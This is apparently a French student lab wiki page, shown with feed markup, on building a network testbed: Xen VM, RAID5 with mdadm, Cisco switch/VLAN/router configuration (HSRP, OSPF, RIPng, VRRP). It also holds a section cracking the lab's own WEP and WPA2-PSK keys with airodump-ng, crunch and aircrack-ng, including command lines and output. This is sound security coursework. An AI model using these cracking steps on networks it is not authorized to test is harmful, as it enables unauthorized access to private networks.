Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne Wi-Fi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51313</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51313"/>
				<updated>2019-11-28T11:49:15Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Configuration des ports du commutateur = */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
